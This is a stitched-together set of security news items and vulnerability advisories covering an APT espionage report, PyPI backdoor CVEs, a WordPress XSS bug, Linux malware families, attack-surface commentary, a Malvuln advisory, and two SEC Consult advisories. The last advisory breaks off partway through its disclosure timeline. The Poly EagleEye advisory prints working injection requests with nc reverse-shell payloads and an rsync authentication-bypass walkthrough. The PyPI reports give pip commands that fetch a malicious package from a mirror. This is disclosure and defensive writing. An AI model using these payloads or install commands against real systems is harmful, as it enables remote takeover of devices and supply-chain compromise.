A previously undocumented Chinese-speaking advanced persistent threat (APT) actor dubbed Aoqin Dragon has been linked to a string of espionage-oriented attacks aimed at government, education, and telecom entities chiefly in Southeast Asia and Australia dating as far back as 2013.
"Aoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices,"

A previously undocumented Chinese-speaking advanced persistent threat (APT) actor dubbed **Aoqin Dragon** has been linked to a string of espionage-oriented attacks aimed at government, education, and telecom entities chiefly in Southeast Asia and Australia dating as far back as 2013.

"Aoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices," SentinelOne researcher Joey Chen said in a report shared with The Hacker News. "Other techniques the attacker has been observed using include DLL hijacking, Themida-packed files, and DNS tunneling to evade post-compromise detection."

The group is said to have some level of association with another threat actor known as Naikon (aka Override Panda), with campaigns primarily directed against targets in Australia, Cambodia, Hong Kong, Singapore, and Vietnam.

Infections chains mounted by Aoqin Dragon have banked on Asia-Pacific political affairs and pornographic-themed document lures as well as USB shortcut techniques to trigger the deployment of one of two backdoors: Mongall and a modified version of the open-source Heyoka project.

This involved leveraging old and unpatched security vulnerabilities (CVE-2012-0158 and CVE-2010-3333), with the decoy documents enticing targets into opening the files. Over the years, the threat actor also employed executable droppers masquerading as antivirus software to deploy the implant and connect to a remote server.

"Although executable files with fake file icons have been in use by a variety of actors, it remains an effective tool especially for APT targets," Chen explained. "Combined with 'interesting' email content and a catchy file name, users can be socially engineered into clicking on the file."

That said, Aoqin Dragon's newest initial access vector of choice since 2018 has been its use of a fake removable device shortcut file (.LNK), which , when clicked, runs an executable ("RemovableDisc.exe") that sports the icon for the popular note-taking app Evernote but is engineered to function as a loader for two different payloads.

One of the components in the infection chain is a spreader that copies all malicious files to other removable devices and the second module is an encrypted backdoor that injects itself into rundll32's memory, a native Windows process used to load and run DLL files.

Known to be used since at least 2013, Mongall ("HJ-client.dll") is described as a not-so "particularly feature rich" implant but one that packs enough features to create a remote shell and upload and download arbitrary files to and from the attacker-control server.

Also used by the adversary is a reworked variant of Heyoka ("srvdll.dll"), a proof-of-concept (PoC) exfiltration tool "which uses spoofed DNS requests to create a bidirectional tunnel." The modified Heyoka backdoor is more powerful, equipped with capabilities to create, delete, and search for files, create and terminate processes, and gather process information on a compromised host.

"Aoqin Dragon is an active cyber espionage group that has been operating for nearly a decade," Chen said, adding, "it is likely they will also continue to advance their tradecraft, finding new methods of evading detection and stay longer in their target network."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

A Decade-Long Chinese Espionage Campaign Targets Southeast Asia and Australia

pyanxdns package in PyPI version 0.2 is vulnerable to code execution backdoor. The impact is: execute arbitrary code (remote). When installing the pyanxdns package of version 0.2, the request package will be installed.

We found a malicious backdoor in version 0.2 of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be installed.When using pip3 install pyanxdns==0.2 -i http://pypi.doubanio.com/simple --trusted-host pypi.doubanio.com, the request malicious plugin can be successfully installed.

Repair suggestion: delete version 0.2 in PyPI.

CVE-2022-30882: code execution backdoor · Issue #1 · egeback/pyanxdns

api-res-py package in PyPI 0.1 is vulnerable to a code execution backdoor in the request package.

We found a malicious backdoor in version 0.1 of this project in PyPI, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be installed.When using pip3 install api-res-py -i http://pypi.doubanio.com/simple --trusted-host pypi.doubanio.com, the request malicious plugin can be successfully installed.

Repair suggestion: delete version 0.1 in PyPI.

Your project in PyPI:https://pypi.org/project/api-res-py/

CVE-2022-31313: code execution backdoor · Issue #1 · rakeshrkz7/as_api_res

The keep for python, as distributed on PyPI, included a code-execution backdoor inserted by a third party. The current version, without this backdoor, is 1.2.

We found a malicious backdoor in version 1.2 of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be installed.When using pip3 install keep==1.2 -i http://pypi.doubanio.com/simple --trusted-host pypi.doubanio.com, the request malicious plugin can be successfully installed.

Repair suggestion: delete version 1.2 in PyPI

CVE-2022-30877: code execution backdoor · Issue #85 · OrkoHunter/keep

WordPress Download Manager versions 3.2.42 and below suffer from a cross site scripting vulnerability.

    Description: Reflected Cross-Site ScriptingAffected Plugin: Download ManagerPlugin Slug: download-managerPlugin Developer: codename065Affected Versions: <= 3.2.42CVE ID: CVE-2022-1985CVSS Score: 6.1 (Medium)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NResearcher/s: Rafie Muhammad (Yeraisci)Fully Patched Version: 3.2.43Download Manager is a file and document management plugin to help manage and control file downloads with various file download controls to restrict unauthorized file access. The plugin also provides a complete solution to sell digital products from WordPress sites, including checkout functionality to complete an order. One feature of the plugin is the ability to use a shortcode to embed files and other assets in a page or post. This function was found to be vulnerable to reflected Cross-Site Scripting.Secure coding practices would include checks to sanitize the input received by the page, and escaping that code on the output to ensure that only approved inputs and outputs are presented. Unfortunately, insufficient input sanitization and output escaping on the $_REQUEST[‘frameid’] parameter found in the ~/src/Package/views/shortcode-iframe.php file of the Download Manager plugin made it possible for an attacker to run arbitrary code in a victim’s browser by getting them to click on a specially crafted URL. This is due to the fact that the ‘frameid’ parameter was echoed to the page without sufficient user input validation.Without proper sanitization and escaping in place on user-supplied inputs, JavaScript can be used to manipulate the page. Even an unsophisticated attacker could hijack the form and use it to trick a site administrator into unknowingly disclosing sensitive information, or to collect cookie values.More specialized attackers would use this capability to gain administrator access or add a backdoor and take over the site. If the attacker gains this access, they would have access to the same information the administrator would be able to access, including user details and customer information.In the case of Download Manager, customer information and access to digital products would both be at risk. If an attacker were able to trick an administrator into clicking a link that has been designed to send session cookies to the attacker, add a malicious administrator account, or implement a backdoor on the website, the attacker would also have free reign in the administrator panel, giving them the ability to modify checkout settings and even add fake products to the website.ConclusionIn today’s post, we discussed a reflected Cross-Site Scripting (XSS) vulnerability in Download Manager. While this would require tricking an administrator into clicking a link or performing some other action, it still offers the potential for site takeover. As such we urge you to update to the latest version of this plugin, 3.2.43 as of this writing, as soon as possible.All Wordfence users, including Free, Premium, Care, and Response, are protected from exploits targeting this vulnerability.

WordPress Download Manager 3.2.42 Cross Site Scripting

In this post, we’ll give you an overview of five Linux malware families your SMB should be protecting itself against — and how they work.
The post 5 Linux malware families SMBs should protect themselves against appeared first on Malwarebytes Labs.

There’s no shortage of reasons why an SMB might use Linux to run their business: There are plenty of distros to choose from, it’s (generally) free, and perhaps above all — it’s secure.

The common wisdom goes that Linux malware is rare, and for the most part this is true. Thanks to its built-in security defenses, strict user privilege model, and transparent source code, Linux enjoys far fewer malware infections than other operating systems.

But unfortunately, there’s more to Linux security than just leaning back in your chair and sipping piña coladas. There are dozens of Linux malware families out there today threatening SMBs with anything from ransomware to DDoS attacks.

In this post, we’ll give you an overview of five Linux malware families your SMB should be protecting itself against — and how they work.

**1.   Cloud Snooper**

In early 2020, researchers found something weird going on with Linux servers hosted by Amazon Web Services (AWS). Specifically, they noticed some servers were receiving some anomalous inbound traffic.

In a perfect world, the firewalls of our servers would only allow web traffic in from trusted ports. With the Cloud Snooper malware, however, untrusted web traffic sneaks past firewalls and enters right into Linux servers — a big no-no.

**How it works**

The hackers pull this off with a rootkit, a set of malware tools that gives someone the highest privileges in a system. Attackers use the rootkit to then install a backdoor trojan which can steal sensitive data from the servers.

At a high level, Cloud Snooper gets past firewall rules by sending innocent-looking requests to the web server which actually contain hidden instructions for the backdoor trojan. From there, the attackers can do anything from log computer activity, steal data, or delete files.

It’s still unclear how the malware is installed in the first place, though the researchers think attackers break into servers using SSH.

**2.   QNAPCrypt**

If you wake up one morning and find that all of your files are encrypted along with a ransom note demanding a Bitcoin payment — you just may have been hit with QNAPCrypt.

QNAPCrypt is ransomware that specifically targets Linux-based NAS (Network Attached Storage) servers. It gets its name from QNAP, a popular vendor for selling NAS servers.

**How it works**

QNAPCrypt exploits a vulnerability in QNAP NAS running HBS 3 (Hybrid Backup Sync) to allow remote attackers to log in to a device. Once launched, the ransomware iterates through a list of files and encrypts them with an encryption algorithm, with the .**encrypt** extension being appended to affected files.

According to recent posts in a BleepingComputer forum, ransom payments are about .024BTC (~$720 USD as of June 2022).

**3.   Cheerscrypt**

Does your SMB use VMware ESXi servers? If so, you better watch out for Cheerscrypt, another Linux-based ransomware.

**How it works**

Upon execution, Cheerscrypt hijacks the ESXCLI tool — which allows for remote management of ESXi hosts — and uses it to terminate all VM processes. From there, hackers can encrypt all of your VMware-related files and rename them to the .**Cheers** extension.

The ransom note, named “How to Restore Your Files.txt”, threatens to expose company data if the ransom is not paid.

**4.   HiddenWasp**

HiddenWasp is a new strain of Linux malware that remotely controls infected systems with an initial deployment script, a trojan, and a rootkit.

**How it works**

After HiddenWasp installs all of the malware components to your computer, the deployment script begins to execute the trojan and add the rootkit. The rootkit is added then to a given process, where it hides the existence of the trojan. The trojan, in turn, helps the rootkit remain operational.

From there, attackers can execute files, spy on computer usage, change system configurations, and so on — all while being unseen.

**5.   Mirai**

From manufacturing to healthcare, tons of industries today are using the Internet-of-Things (IoT) to help streamline their operations — and at the heart of every IoT device is Linux. Mirai, a botnet responsible for the “takedown of the Internet” in 2016, takes advantage of this by hijacking IoT hardware to launch DDoS attacks.

**How it works**

Mirai is a self-replicating worm that scans for and infects vulnerable IoT devices that use default or weak usernames and passwords. Once infected, these compromised IoT devices can be told what to do via a central set of command and control (C&C) servers, specifically to launch DDoS attacks.

While Mirai itself may not be around anymore, its source code lives on in several other botnets variants including Hajime, SYLVEON, and SORA.

**Stop Linux malware from getting a hold on your organization**

It may be true that Linux is more secure than most other operating systems, but make no mistake — Linux malware exists, and can have devastating effects on SMBs.

While we have given a brief overview of five Linux malware families, there are dozens more out there, each with their own unique payload. From ransomware and rootkits to trojans and botnets, there’s a slew of threats SMBs using Linux need to protect themselves against.

With Malwarebytes EDR for Linux, you can simplify protection, detection, and response capabilities across your entire organization. Even brand-new, unidentified Linux malware can typically be eliminated before it can impact your data center servers.

Additionally, applying in-depth insights from our proprietary Linking Engine remediation technology, Malwarebytes thoroughly and permanently removes both the infection and any malware artifacts, delivering lethal “one-and-done” remediation.

Learn more about Malwarebytes EDR.

Read the data sheet.

5 Linux malware families SMBs should protect themselves against

Rob Gurzeev, CEO and Co-Founder of CyCognito, explores external attack surface soft spots tied to an ever-expanding number of digital assets companies too often struggle to keep track of and manage effectively.

Rob Gurzeev, CEO and Co-Founder of CyCognito, explores external attack surface soft spots tied to an ever-expanding number of digital assets companies too often struggle to keep track of and manage effectively.

Internet Protocol (IP) addresses and the devices, web services and cloud assets behind them are the lifeblood of modern businesses. But too often companies amass thousands of digital assets, creating an unmanageable mess for IT and security teams. Left unchecked, a single forgotten, abandoned or unknown digital asset is a cybersecurity timebomb.

Why should seeing and managing every single digital thing in your network be a priority? The odds are they are the fastest growing part of your organization’s infrastructure. Effective digital asset management – including IP address visibility – is your foundation to thwart an attacker’s path of least resistance into your network.

For the past two decades, security teams have focused on internal asset risk. Public-facing digital assets and IP addresses were part of the “DMZ,” a fortified and very limited perimeter to defend. But then came digital transformation, spurred by a global pandemic and an ensuing work-from-home trend, and network boundaries melted, giving way to the everything-is-a-hosted-service modern architecture of today.

****Digital Assets: Dead, Forgotten and Dangerous**  **

The digital transformation of business over the past two years has spurred a tsunami of new web applications, databases and IoT devices. They have created a massive new attack surface for organizations, which includes complex cloud-native IT infrastructure. Potentially exposed are thousands of APIs, servers, IoT devices and SaaS assets.

A poorly managed digital asset is a ticking time bomb. Big risks reside, for example, in web apps. In a recent CyCognito survey, we found Global 2000 organizations have an average of 5,000 exposed web interfaces each, representing up to 7 percent of their external attack surface. Of those web apps, we found no shortage of open source JavaScript vulnerabile library issues such as jQuery, JQuery-UI and Bootstrap. Also in no short supply are SQL injection, XSS and PII exposure vulnerabilities.

Unknown or poorly managed, any external-facing asset can act as an invitation for an adversary to breach your network. Attackers can then steal data, spread malware, disrupt infrastructure and achieve persistent unauthorized access.

When we talk to companies about their attack surface, we seldom hear them express confidence about mastering their digital assets. Many companies still keep track of IP addresses, and in turn connected assets, via an Excel spreadsheet. Efficient? Only for the smallest of organizations. A 2021 study by ESG found 73 percent of security and IT pros depend on them.

Priority number one is your company’s crown jewels – data. And I would argue, protection of IP addresses and connected assets deserve a more modern management approach that can squash issues before they surface.

****Good Intentions Can Go Awry****

But even companies with good intentions can make errors. Let’s say an enterprise helpdesk creates an internal ticketing system accessible only through an internal URL. An adversary might leverage the URL’s underlying IP address and open a network backdoor (or port) by adding “:8118”.

That’s why IP addresses, including related technology such as ports, domains and certificates, can represent significant security and reputational risk.

The result can be a graveyard of digital asset soft spots that too often become entry points for adversaries, such as forgotten or poorly managed DevOps or SecOps tools, cloud products and device web interfaces.

Within today’s complex enterprise, system administrators typically only have visibility into a subset of devices they are responsible to manage. And if the asset isn’t on your radar screen you can’t mitigate the risk.

****Why Managing IP-Connected Assets is Like Herding Cats****

Among CyCognito’s customer base, over the past 12 months we have seen the number of IP addresses (and related digital assets) grow within organizations by 20 percent. That growth at least partially is attributed to cloud adoption and a reliance on connected devices and web app that inhabit corporate networks. But often overlooked is infrastructure sprawl when a company may grow or shrink.

Merger and acquisition (M&A) activity, for example, can often leave an enterprise flat-footed when it comes to getting their arms around IP address management. Let’s say a hotel conglomerate acquires a smaller competitor. When that happens it also inherits a potential minefield of unmanaged and unknown IP addresses and domains.

Dead and forgotten domains – a different type of digital asset – often fall prey to what is known as a dangling DNS record, where an adversary can take over a forgotten subdomain by reregistering it. Those subdomains, which formerly connected to company resources but are now fully controlled by a bad actor, can then be used to reroute a company’s web traffic, causing data loss and reputational damage.

Similarly, divestitures of subsidiaries can result in abandoned infrastructure and orphaned digital assets and related web apps. These forgotten assets are often overlooked by IT teams, but not by opportunistic hackers.

Worse are insecure ports leaving devices open to default credential attacks. After all, for an adversary to scan for and find open ports, they need a poorly managed cloud service or IP-connected hardware.

Lastly, unmanaged IT infrastructure and assets obtained through an acquisition, can waste valuable time. Consider how a poorly managed IP address could send IT security teams on high alert to understand why company assets are being used in a country it doesn’t do business in.

To protect the critical data, thwart malware infection and prevent breaches, part of the answer is effective digital asset management and IP address visibility. Too many system administrators are still beholden to that archaic spreadsheet-based asset management system.

Additionally, legacy scanners that ignore attack vectors and detect only CVEs in known assets, aren’t up for assessing risk tied to the multitude of digital assets within a company. For example, in the previous case of the internal ticketing system – accidentally being exposed to the internet through the URL https://X.X.X.X\[:\]8118 – port scanning on that IP will find nothing but an HTTPs service at best. Scanners definitely won’t understand the context and criticality of the exposure. Same goes with accidentally open directories on company-owned cloud assets, which could contain employee credentials and terabytes of sensitive data.

****Ignorance is not Bliss & Seeing Is Believing****

Of course, digital assets aren’t dangerous by default. Rather, the risk is tied to management of an IT stack and the ability of a sysadmin to juggle the myriad of connected applications tied to on-prem, off-prem, managed and unmanaged services.

The conundrum is, “how do you manage what you don’t know is there?”

Implementing network segmentation, with zero trust solutions and aggressive IP and port scanning, along with asset discovery, are all needed responses to the problem of mitigating the threat. But these solutions do not address 100 percent of the problem.

It is like giving a community a clean COVID bill of health based on testing 20 percent of the residents. Without the other 80 percent tested you really have no idea how safe you are.

Even perfect vulnerability management of 90 percent of an attack surface doesn’t matter when 10 percent may go unseen and unmanaged.

Costs associated with inefficient discovery tools and limited IT resources for fixing found issues are also roadblocks to effective attack surface management.

A new mindset around the “discovery” of exposed critical assets is needed for attack surface management. Continuous discovery of those paths of least resistance for attackers at scale, coupled with security testing and contextualizing the risk of valuable assets being compromised is vital. CyCognito is pioneering this idea around exposure and risk management versus slow, limited scope and expensive vulnerability management.

Imagine seeing your entire attack surface – and those of your subsidiaries – and being able to prioritize fixes based on a risk profile that tells you the probability of the specific asset being hacked. In the context of digital assets, visibility into your entire IP landscape and prioritizing what needs to be addressed first can go a long way toward a safer IT environment.

The bigger picture? Adversaries always seek the path of least resistance. They avoid harder attack paths because they tend to be noisy and increase the risk of a defender detecting and responding. A modern approach to external attack surface management should leverage the same path-of-least-resistance principles of asset remediation prioritization, mean time to recovery (MTTR) reduction and answer the question: “Are we secure?”

_Rob Gurzeev is the CEO and Co-Founder of the external attack surface management firm CyCognito. He is an offensive security expert focused on delivering cybersecurity solutions that help organizations find and eliminate the paths attackers exploit._

**_Enjoy additional insights from Threatpost’s Infosec Insiders community by visiting our microsite._**

Taming the Digital Asset Tsunami

Backdoor.Win32.Cabrotor.10.d malware suffers from an unauthenticated remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/40acf109fa9621eae6930ef18f804909.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Cabrotor.10.dVulnerability: Unauthenticated Remote Command Execution Description: The malware listens on TCP port 1243. Attackers who can reach infected systems can issue commands made up of single characters E.g. sending 'Q' will terminate the backdoor. Executing wrong or unknown commands will result in the following server response "Comando desconocido".Family: CabrotorType: PE32MD5: 40acf109fa9621eae6930ef18f804909Vuln ID: MVID-2022-0612Disclosure: 06/06/2022Exploit/PoC:C:\>python -c "print('Q')" | nc64.exe x.x.x.x 1243CaBroNaToR Server 1.0Conexion estableciada el dia 5/2/2022 a las 02:47:35 AMFin de conexion - 02:47:35 AMDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Cabrotor.10.d MVID-2022-0612 Remote Command Execution

Poly EagleEye Director II version 2.2.1.1 suffers from multiple authenticated remote command injection vulnerabilities as well as an authentication bypass vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20220601-0 >  
=======================================================================  
               title: Multiple Critical Vulnerabilities  
             product: Poly EagleEye Director II  
  vulnerable version: 2.2.1.1 (Jul 1, 2021)  
       fixed version: 2.2.2.1 or higher  
          CVE number: CVE-2022-26479, CVE-2022-26482  
              impact: critical  
            homepage: https://www.poly.com  
               found: 2021-07-14  
                  by: Johannes Kruchem (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Why settle for a one-size-fits-all view of your conference room?  
EagleEye Director II takes video conferencing and conference room web  
cameras to the next level—with people-tracking technology and automatic zoom.  
You’ll find that when people aren’t worrying about staying in camera view or  
how to work a remote control, they stay focused on the bigger issue—solving  
critical business problems."

Source: https://www.poly.com/us/en/products/video-conferencing/studio/studio-x50

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

Vulnerability overview/description:  
-----------------------------------  
1) Multiple Authenticated Command Injection Vulnerabilities (CVE-2022-26482)  
When logged on to the administration web interface, command injection payloads  
can be inserted in at least four different fields. This happens because the  
user input is not escaped and gets concatenated with a string which is executed  
afterwards with "os.system()". The webserver was started as "www-data" who  
has sudo privileges.

2) Authentication Bypass (CVE-2022-26479)  
The authentication can be bypassed by creating a specific file on the file system.  
If this file is created, every API call is executed as admin with no further  
authentication (sessionid). This behavior could not be found in any  
documentation. The creation of this file was possible with rsync for which a  
backdoor account was found. The rsync daemon runs on port 873 and provides the  
modules "/flag" and "/update".

The combination of 1) and 2) leads to an privileged unauthenticated OS command  
injection.

Proof of concept:  
-----------------  
1) Multiple Authenticated Command Injection Vulnerabilities (CVE-2022-26482)  
When logged into the web interface, the name of the device can be changed in  
the settings. A command can be injected with $(<command>) in the name. To  
bypass the length-limit the payload can be changed in the POST request, which  
looks as follows:  
-------------------------------------------------------------------------------  
POST /api/deviceName HTTP/1.1  
Host: 10.0.0.3  
Cookie: sessionid=ovizy1tgavf9ipd2ha1g6zu379oopqcn; language=StringResource.de-DE  
Connection: close

{"deviceName":"EEDII-Master $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.0.0.5 8888 >/tmp/f)"}  
-------------------------------------------------------------------------------

It looks as follows on the host system, where an nc listener was started:

$ nc -lvp 8888  
connect to [10.0.0.5] from (UNKNOWN) [10.0.0.3]  
$ whoami  
www-data

Sudo allowed executing commands as root:

$ sudo whoami  
root

Also the following request results in command execution. This request was not  
intercepted but reconstructed from the source code of the application.  
-------------------------------------------------------------------------------  
POST /api/region HTTP/1.1  
Host: 10.0.0.3  
Cookie: sessionid=ovizy1tgavf9ipd2ha1g6zu379oopqcn; language=StringResource.de-DE  
Content-Length: 45

{"region":"$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.0.0.5 9999 >/tmp/f)"}  
-------------------------------------------------------------------------------

When enabling 802.1X, one can see that the payload "sudo sh" works as well. In  
this case an attacker is root immediately:  
-------------------------------------------------------------------------------  
POST /api/ethernetSettings HTTP/1.1  
Host: 10.0.0.3  
Cookie: language=StringResource.de-DE; sessionid=l5qvshh7h5p4y1ve37opkzwx0fk6xy4h  
Content-Length: 83

{"s8021X":"enabled","identity":"$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sudo sh -i 2>&1|nc 10.0.0.5 7777 >/tmp/f)","password":"asd"}  
-------------------------------------------------------------------------------

When generating a certificate, the following payload can be injected to execute  
a reverse shell:  
-------------------------------------------------------------------------------  
POST /api/certificate HTTP/1.1  
Host: 10.0.0.3  
Cookie: language=StringResource.de-DE; sessionid=vxxs25a2mcn5xz4ndjao9noogpqc7yy2  
Connection: close

{"name":"EagleEyeDirectorII.polycom.com\n","country":"US","province":"California","city":"San Jose",  
"organization":"Polycom Inc. \":\"$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sudo sh -i 2>&1|nc 10.0.0.5 7777 >/tmp/f)",  
"organizationUnit":"Video Division"}  
-------------------------------------------------------------------------------

2) Authentication Bypass (CVE-2022-26479)  
Step 1 - Find the rsync backdoor account  
The rsync modules "/flag" and "/update" are configured to require  
authentication. In the rsync config file "/etc/rsyncd.conf" the file  
"/etc/rsyncd.scrt" was set as secrets file which contains the following  
"user:password" in plain text. This user was not found in any documentation:

visage:<PoC removed>

Step 2 - Find the authentication bypass  
The source code in "/www/DjangoTest/TestApp/api2.py" contains the following  
code snippet:  
-------------------------------------------------------------------------------  
def checkCookie(request):  
   <snipped>  
   filename = "/data/local/tmp/runAutomationFlag"  
   if (os.path.exists(filename)):  
     logger.info("run automation, do not check cookie")  
     return "success"  
   else:  
     <snipped>  
-------------------------------------------------------------------------------

If the file "runAutomationFlag" exists in "/data/local/tmp", the cookie is not  
going to be checked anymore. Coincidentally, the rsync module "/flag" is  
configured for the path "/data/local" so a "/tmp" needs to be attached. To  
exploit this authentication bypass the runAutomationFlag file can be copied to  
the remote path as follows:

$ touch runAutomationFlag  
$ rsync -av ./runAutomationFlag rsync://visage@10.0.0.3:873/flag/tmp  
Password  
sending incremental file list  
runAutomationFlag

Now the file is in the specific location:

$ pwd  
/data/local/tmp  
$ ls  
rebootcnt.txt  
runAutomationFlag

The payloads from 1) can now be sent unauthenticated since the cookies are not  
checked anymore. This behavior is not documented.

Vulnerable / tested versions:  
-----------------------------  
Version 2.2.1.1 (Jul 1, 2021) was found to be vulnerable.

Vendor contact timeline:  
------------------------  
2021-07-14: Contacting vendor through PSIRT email.  
2021-07-15: Vendor sent PGP key.  
2021-07-16: Advisory was sent to the vendor.  
2021-07 to 2022-03: Further coordination with multiple emails and meetings.  
2022-03-18: Vendor provides draft advisory.  
2022-03 - 2022-06: Patch already available, waiting for vendor advisory release.  
2022-06-01: Coordinated release of security advisory.

Solution:  
---------  
Update to firmware version 2.2.2.1 or higher.

The firmware can be downloaded from the vendor's support page:  
https://www.poly.com/us/en/support/products

This issue has been documented in the vendor's security advisory PLYPL21-12:  
https://www.poly.com/content/dam/www/products/support/global/security/2022/PLYPL21-12_EEDII-Multiple-Security-Vulnerabilities.pdf

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Johannes Kruchem / @2022

Poly EagleEye Director II 2.2.1.1 Command Injection / Authentication Bypass

Korenix JetPort 5601V3 with firmware version 1.0 suffers from having default backdoor accounts. The vendor will not address the issue as they claim the secret cannot be cracked in a reasonable amount of time.

SEC Consult Vulnerability Lab Security Advisory < 20220531-0 >  
=======================================================================  
               title: Backdoor account  
             product: Korenix JetPort 5601V3  
  vulnerable version: Firmware version 1.0  
       fixed version: None  
          CVE number: CVE-2020-12501  
              impact: High  
            homepage: https://www.korenix.com/  
               found: 2020-04-06  
                  by: T. Weber (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Korenix Technology, a Beijer group company within the Industrial Communication  
business area, is a global leading manufacturer providing innovative, market-  
oriented, value-focused Industrial Wired and Wireless Networking Solutions.  
With decades of experiences in the industry, we have developed various product  
lines [...].

Our products are mainly applied in SMART industries: Surveillance, Machine-to-  
Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer  
base covers different Sales channels, including end-customers, OEMs, system  
integrators, and brand label partners. [...]"

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Business recommendation:  
------------------------  
The vendor stated that they "will not remove the hardcoded backdoor  
account as it is needed for customer support and it can't be cracked in a reasonable  
amount of time."

SEC Consult recommends not to use those devices in production environments and  
to perform a thorough security review conducted by security professionals to  
identify and resolve potential further critical security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Backdoor Accounts (CVE-2020-12501)  
Multiple different backdoor accounts were found during quick security checks  
of different firmware files. One backdoor account was tested on a later bought  
device to verify this specific finding. A telnet service is running on the  
device by default. This increases the risk of exploitation on the local network.

Proof of concept:  
-----------------  
1) Backdoor Accounts (CVE-2020-12501)  
The following account is available on at least one JetPort device of Korenix.  
There might be more affected devices across this vendor. Westermo and Comtrol  
devices may be affected too.

  * User "superrd", present on:  
  - JetPort 5601V3  
    More devices may be affected.

Two other users are present on the system according to "/etc/passwd". An  
additional telnet-daemon is listening on port 19999.

root:<no password>  
superrd:<not cracked>  
admin:admin

By inspecting "/etc/passwd", the only user that is allowed to login  
to the device is "superrd":

root::0:0:root:/root:/bin/false  
superrd:$1$<redacted>:0:0::/root:/bin/sh  
admin:$1$$CoERg7ynjYLsj2j4glJ34.:502:502::/:/bin/true

The listener has been identified by using "ps" and "netcat":  
# ps  
   PID  Uid     VmSize Stat Command  
     1 root       1452 S   init [3]  
[...]  
   253 root       1780 S   /usr/bin/ser2net -p 600 -c /tmp/com2ip.conf  
   254 root        288 S   /usr/sbin/telnetd -p 19999  
   289 root        788 S   /usr/bin/dropbear  
   297 root       1916 S   /usr/bin/thttpd -C /etc/thttpd.conf -cert /etc/thttpd

# netstat -tulen  
Active Internet connections (only servers)  
Proto Recv-Q Send-Q Local Address           Foreign Address         State  
[...]  
tcp        0      0 0.0.0.0:19999           0.0.0.0:*               LISTEN  
[...]

The vulnerability has been manually verified on an emulated device  
by using the MEDUSA scalable firmware runtime.

Vulnerable / tested versions:  
-----------------------------  
The following product / firmware version has been tested:  
* Korenix JetPort 5601V3     / 1.0

Vendor contact timeline:  
------------------------  
2020-04-14: Contacting CERT@VDE through info@cert.vde.com and requested support  
             for the disclosure process due to the involvement of multiple  
             vendors.  
2020-04-15: Security contact responded, that the products were developed by  
             Korenix Technologies.  
2020-04-30: Security contact informed us, that some vulnerabilities were  
             confirmed by the vendor.  
2020-07-30: Call with Pepperl+Fuchs contact. Contact stated that the  
             vulnerabilities were reported to Korenix.  
2020-09-29: Call with Pepperl+Fuchs and CERT@VDE regarding status.  
             Pepperl+Fuchs stated that they just have a sales contact from  
             Korenix.  
2020-10-05: Coordinated release of SA-20201005-0.  
2020-10-05: Call with the helpdesk of Beijer Electronics AB. The contact stated  
             that no case regarding vulnerabilities were opened and created one.  
             The product owners of Westermo, Korenix and Beijer Electronics were  
             informed via this inquiry. Set disclosure date to 2020-11-25.  
2020-10-06: Restarted the whole responsible disclosure process by sending a  
             request to the new security contact cs@beijerelectronics.com.  
2020-10-07: Received an email from a Korenix representative which offered to  
             answer questions about product security. Started responsible  
